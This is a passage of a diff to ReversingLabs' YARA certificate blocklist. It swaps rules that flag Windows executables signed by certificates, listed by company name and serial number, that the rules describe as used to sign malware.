-		logic_hash = "839f55e8fe7a86aad406e657fdef48925543b5d3884927104fd3786444a8fccc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4870-L4888"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5bb78a5e39f9d023cf63edabdc83d4965fc79f6f04f9fea9bcf2a53223fbd4ca"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15463,21 +40128,21 @@ rule REVERSINGLABS_Cert_Blocklist_435Abf46053A0A445C54217A8C233A7F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Kodemika" and pe.signatures [ i ] . serial == "43:5a:bf:46:05:3a:0a:44:5c:54:21:7a:8c:23:3a:7f" and 1616976000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AntiFIX s.r.o." and ( pe.signatures [ i ] . serial == "00:2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3" or pe.signatures [ i ] . serial == "2c:90:ea:f4:de:3a:fc:03:ba:92:4c:71:94:35:c2:a3" ) and 1586293430 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B2F9C693A2E6634565F63C79B01Dd8F8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Aff762E907F0644E76Ed8A7485Fb12A1 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c094666a-0bb3-5cb6-82a8-3074b9eed32b"
+		id = "3b3bbbdd-9c2d-5c80-a121-3e3ad13e9ac6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L11992-L12010"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f5ec67c082be21a2495ef90fd0a6d4fc4b1379c4903dcc051d39cf1913d5cf20"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4890-L4908"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ad05389e0eb30cb894b03842d213b8c956f66357a913c73d8d8b79f8336bf980"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15487,21 +40152,21 @@ rule REVERSINGLABS_Cert_Blocklist_B2F9C693A2E6634565F63C79B01Dd8F8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PHL E STATE ApS" and ( pe.signatures [ i ] . serial == "00:b2:f9:c6:93:a2:e6:63:45:65:f6:3c:79:b0:1d:d8:f8" or pe.signatures [ i ] . serial == "b2:f9:c6:93:a2:e6:63:45:65:f6:3c:79:b0:1d:d8:f8" ) and 1620000000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Lets Start SP Z O O" and ( pe.signatures [ i ] . serial == "00:af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1" or pe.signatures [ i ] . serial == "af:f7:62:e9:07:f0:64:4e:76:ed:8a:74:85:fb:12:a1" ) and 1594882330 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_54A6D33F73129E0Ef059Ccf51Be0C35E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D8530214Ca0F512946496B5164C61201 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1cf2bda8-05e6-5f0a-a28a-2f5fa02775c9"
+		id = "0125a67a-d5e7-5c93-a58c-cacb6d8fa60b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12012-L12028"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6fbed9c8537ea2baeb58044a934fc9741730b8a3ae4d059c23b033973d7ff7d3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4910-L4928"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "377962915586c9f5a5737c24b698c96efc2e819e52ee16109c405f9af2d57e7f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15511,21 +40176,21 @@ rule REVERSINGLABS_Cert_Blocklist_54A6D33F73129E0Ef059Ccf51Be0C35E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "STAFFORD MEAT COMPANY, INC." and pe.signatures [ i ] . serial == "54:a6:d3:3f:73:12:9e:0e:f0:59:cc:f5:1b:e0:c3:5e" and 1607100127 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DJ ONLINE MARKETING LIMITED" and ( pe.signatures [ i ] . serial == "00:d8:53:02:14:ca:0f:51:29:46:49:6b:51:64:c6:12:01" or pe.signatures [ i ] . serial == "d8:53:02:14:ca:0f:51:29:46:49:6b:51:64:c6:12:01" ) and 1595485920 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_142Aac4217E22B525C8587589773Ba9B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_661Ba8F3C9D1B348413484E9A49502F7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "488be2f7-e3d4-51e3-b7bb-142caa7b2bd5"
+		id = "a0c501c9-a856-55b6-b845-aeab4db5ab51"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12030-L12046"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f169925c27f5e0f8d5f658b83d1b9fa4548c4443b16bd4d7f87aa2b8e44bf06b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4930-L4948"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4840b311c1e2c0ae14bb2cf6fa8d96ab1a434ceac861db540697f3aed1a6833f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15535,21 +40200,21 @@ rule REVERSINGLABS_Cert_Blocklist_142Aac4217E22B525C8587589773Ba9B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "A.B. gostinstvo trgovina posredni\\xC5\\xA1tvo in druge storitve, d.o.o." and pe.signatures [ i ] . serial == "14:2a:ac:42:17:e2:2b:52:5c:85:87:58:97:73:ba:9b" and 1614124800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unique Digital Services Ltd." and ( pe.signatures [ i ] . serial == "00:66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7" or pe.signatures [ i ] . serial == "66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7" ) and 1594942800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_239664C12Baeb5A6D787912888051392 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_51Aead5A9Ab2D841B449Fa82De3A8A00 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4d24a880-6fa5-5c22-875e-29f4985e3750"
+		id = "c4909945-f2f1-53b2-b438-edf411fda7ed"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12048-L12064"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ab2c228088a4c11b3a0f1a5f0acf181cc31e548781cb3f1205475bfbe39c7236"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4950-L4966"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e53095aab9d6c2745125e8cd933334ebc2e51a9725714d31a46baa74b8e42ed9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15559,21 +40224,21 @@ rule REVERSINGLABS_Cert_Blocklist_239664C12Baeb5A6D787912888051392 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORTH PROPERTY LTD" and pe.signatures [ i ] . serial == "23:96:64:c1:2b:ae:b5:a6:d7:87:91:28:88:05:13:92" and 1618272000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Corsair Software Solution Inc." and pe.signatures [ i ] . serial == "51:ae:ad:5a:9a:b2:d8:41:b4:49:fa:82:de:3a:8a:00" and 1501577475 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0218Ebfd5A9Bfd55D2F661F0D18D1D71 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_03B630F9645531F8868Dae8Ac0F8Cfe6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d03619c7-c4e8-57bd-a19e-1452ab7a76df"
+		id = "be945687-9b8c-5d84-9992-fd317eddae54"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12066-L12082"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4aabe3beab0055b6ef8f6114c5236940f5693b44e94efd14132b450bb9232c03"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4968-L4984"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6d2f4346760bf52a438c4c996e92a2641bebfd536248776383d7c8394e094e6a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15583,21 +40248,21 @@ rule REVERSINGLABS_Cert_Blocklist_0218Ebfd5A9Bfd55D2F661F0D18D1D71 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REI LUX UK LIMITED" and pe.signatures [ i ] . serial == "02:18:eb:fd:5a:9b:fd:55:d2:f6:61:f0:d1:8d:1d:71" and 1608508800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Geksan LLC" and pe.signatures [ i ] . serial == "03:b6:30:f9:64:55:31:f8:86:8d:ae:8a:c0:f8:cf:e6" and 1594252801 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_35590Ebe4A02Dc23317D8Ce47A947A9B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_6F8373Cf89F1B49138F4328118487F9E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2f72a686-c30c-572d-a78c-03747ac325b6"
+		id = "80c5d205-7f5e-5e06-b490-f33205154974"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12084-L12100"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2d4bc88943cdc8af00effab745e64e60ef662c668a0b2193c256d11831ef1554"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L4986-L5002"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f926c2f73d47d463721a0cad48d9866192df55d71867941a40cba7e0b7725102"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15607,21 +40272,21 @@ rule REVERSINGLABS_Cert_Blocklist_35590Ebe4A02Dc23317D8Ce47A947A9B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Largos" and pe.signatures [ i ] . serial == "35:59:0e:be:4a:02:dc:23:31:7d:8c:e4:7a:94:7a:9b" and 1602201600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "30 PTY LTD" and pe.signatures [ i ] . serial == "6f:83:73:cf:89:f1:b4:91:38:f4:32:81:18:48:7f:9e" and 1572566400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Aa07D4F2857119Cee514A0Bd412F8201 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E38259Cf24Cc702Ce441B683Ad578911 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6bb83f26-90f5-587f-8c69-fa06beaead3e"
+		id = "fc5df86f-b8c9-58b1-bd41-e03ed50829dd"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12102-L12120"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fbbea89f2070b2a527bba6199022fbffd269e664b000988a59adf4ca0d4a9f22"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5004-L5022"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2428df14a18f4aed1a3db85c1fb43a847fae8a922c6dc948f3bc514dc4cae09c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15631,21 +40296,21 @@ rule REVERSINGLABS_Cert_Blocklist_Aa07D4F2857119Cee514A0Bd412F8201 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HANGA GIP d.o.o." and ( pe.signatures [ i ] . serial == "00:aa:07:d4:f2:85:71:19:ce:e5:14:a0:bd:41:2f:82:01" or pe.signatures [ i ] . serial == "aa:07:d4:f2:85:71:19:ce:e5:14:a0:bd:41:2f:82:01" ) and 1615766400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Akhirah Technologies Inc." and ( pe.signatures [ i ] . serial == "00:e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11" or pe.signatures [ i ] . serial == "e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11" ) and 1597276800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_40F5660A90301E7A8A8C3B42 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Bdc81Bc76090Dae0Eee2E1Eb744A4F9A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c47bb4f0-d60b-5948-ac10-6083606ed46a"
+		id = "66feefd2-9cec-56fc-a1c1-11004363462d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12122-L12138"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3573d1d5f11df106f1f6f44f8b0164992f2a50707c6df7b08b05ed9ea7d9173b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5024-L5042"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "4fc3e57bedb6fb7c96e6a1ee2ad2aec3860716ac714d52ea58b86be4bbda4660"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15655,21 +40320,21 @@ rule REVERSINGLABS_Cert_Blocklist_40F5660A90301E7A8A8C3B42 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Booz Allen Hamilton Inc." and pe.signatures [ i ] . serial == "40:f5:66:0a:90:30:1e:7a:8a:8c:3b:42" and 1641833688 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALM4U GmbH" and ( pe.signatures [ i ] . serial == "00:bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a" or pe.signatures [ i ] . serial == "bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a" ) and 1579824000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0400C7614F86D75Fe4Ee3F6192B6Feda : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B2E730B0526F36Faf7D093D48D6D9997 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "500c9604-cc07-52b1-8c46-09894d132205"
+		id = "eb82e05b-9aee-5ea7-88a5-8d186b8aafb8"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12140-L12156"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "47735267e9a0fb8107f6c4008bacc8aada1705f6714a0447dacc3928fc20cad6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5044-L5062"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f74cc94428d7739abf6ee76f6cbd53aa47cea815a014de0d786fe53b15f66201"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15679,21 +40344,21 @@ rule REVERSINGLABS_Cert_Blocklist_0400C7614F86D75Fe4Ee3F6192B6Feda : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "StackUp ApS" and pe.signatures [ i ] . serial == "04:00:c7:61:4f:86:d7:5f:e4:ee:3f:61:92:b6:fe:da" and 1626393601 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bamboo Connect s.r.o." and ( pe.signatures [ i ] . serial == "00:b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97" or pe.signatures [ i ] . serial == "b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97" ) and 1597276800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E573D9C8B403C41Bd59Ffa0A8Efd4168 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7156Ec47Ef01Ab8359Ef4304E5Af1A05 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2e799dd9-d143-55a7-9d07-d5f289477b24"
+		id = "b285a407-7f71-5c7e-baae-bfa111a50101"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12158-L12176"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "425126b90fe2ab7c1ec7bf2fd5a91e4438a81992f20f99ed87ec62e7f20043cd"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5064-L5080"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7bb093287dd309ce12859eca9a9fc98095b3d52ec860626fe6e743bace262fde"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15703,21 +40368,21 @@ rule REVERSINGLABS_Cert_Blocklist_E573D9C8B403C41Bd59Ffa0A8Efd4168 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"VERONIKA 2\" OOO" and ( pe.signatures [ i ] . serial == "00:e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68" or pe.signatures [ i ] . serial == "e5:73:d9:c8:b4:03:c4:1b:d5:9f:fa:0a:8e:fd:41:68" ) and 1563148800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BOREC, OOO" and pe.signatures [ i ] . serial == "71:56:ec:47:ef:01:ab:83:59:ef:43:04:e5:af:1a:05" and 1597363200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B06Bc166Fc765Dacd2F7448C8Cdd9205 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_13794371C052Ec0559E9B492Abb25C26 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4b27c958-58f1-5fbd-8a39-aedfe4dafe39"
+		id = "31f119a3-e0da-5875-826f-68c40c6f8b88"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12178-L12196"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2c47166f02c7f94bb4f82296e3220ff7ca3c6c53566d855b2fe77cb842a5fb43"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5082-L5098"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7383d1fb1fa6e49f8fa9e1eecfe3fcedb8a11702fbd3700630a11b12da29fedf"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15727,21 +40392,21 @@ rule REVERSINGLABS_Cert_Blocklist_B06Bc166Fc765Dacd2F7448C8Cdd9205 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GAS Avto, d.o.o." and ( pe.signatures [ i ] . serial == "00:b0:6b:c1:66:fc:76:5d:ac:d2:f7:44:8c:8c:dd:92:05" or pe.signatures [ i ] . serial == "b0:6b:c1:66:fc:76:5d:ac:d2:f7:44:8c:8c:dd:92:05" ) and 1615507200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Carmel group LLC" and pe.signatures [ i ] . serial == "13:79:43:71:c0:52:ec:05:59:e9:b4:92:ab:b2:5c:26" and 1599177600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E9268Ed63A7D7E9Dfd40A664Ddfbaf18 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5C7E78F53C31D6Aa5B45De14B47Eb5C4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a93b0a98-cfec-5e32-9fd8-b3d6c4353558"
+		id = "5906107a-03ce-5ca4-b0a7-12b0b45359dd"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12198-L12216"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fc840c0b37867c3b0aa80d4dc609feaaab77d3f0c6f84c8bb2ea7c5a6461ebb8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5100-L5116"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7521abc5c93f0336af4fab95268962aa3d3fb48fed6a8ba7fdb98e373158b327"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -15751,21 +40416,21 @@ rule REVERSINGLABS_Cert_Blocklist_E9268Ed63A7D7E9Dfd40A664Ddfbaf18 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Casta, s.r.o." and ( pe.signatures [ i ] . serial == "00:e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18" or pe.signatures [ i ] . serial == "e9:26:8e:d6:3a:7d:7e:9d:fd:40:a6:64:dd:fb:af:18" ) and 1647302400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cubic Information Systems, UAB" and pe.signatures [ i ] . serial == "5c:7e:78:f5:3c:31:d6:aa:5b:45:de:14:b4:7e:b5:c4" and 1579824000 <= pe.signatures [ i ] . not_after )
 }
 
